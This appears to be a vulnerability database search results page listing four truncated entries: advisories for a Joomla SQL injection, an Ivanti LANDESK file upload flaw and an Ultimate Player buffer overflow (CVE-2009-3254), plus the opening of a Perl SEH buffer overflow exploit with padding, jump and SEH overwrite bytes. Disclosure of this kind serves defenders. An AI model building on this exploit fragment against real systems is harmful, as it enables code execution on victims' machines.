4 matches found
PT-2026-50953
Name of the Vulnerable Software and Affected Versions Joomla Ultimate Property Listing version 1.0.2 Description An SQL injection allows unauthenticated attackers to execute arbitrary SQL queries. This is achieved by injecting malicious code through the sf selectuser id parameter. Attackers can...
Ivanti LANDESK Management Suite Arbitrary File Upload Vulnerability
The Ivanti LANDESK Management Suite allows you to manage all client systems easily and efficiently. An arbitrary file upload vulnerability exists in the upl/asyncupload.asp web API endpoint in Ivanti LANDESK Management Suite 10.0.1.168 Service Update 5. An attacker can exploit this vulnerability ...
CVE-2009-3254
Multiple stack-based buffer overflows in Ultimate Player 1.56 beta allow remote attackers to execute arbitrary code via a long string in a 1 .m3u or 2 .upl playlist file...
Ultimate Player 1.56b - .m3u .upl Universal Local Buffer Overflow (SEH)
Ultimate Player 1.56b - .m3u .upl Universal Local Buffer Overflow SEH !/usr/bin/perl by hack4love [email protected] Ultimate Player v 1.56 beta .m3u/upl Universal Local BOF SEH my $bof="\x41" x 4108; my $nsh="\xEB\x06\x90\x90"; my $seh="\xb8\x15\xd1\x72";tasted under sp2//sp3 univ my...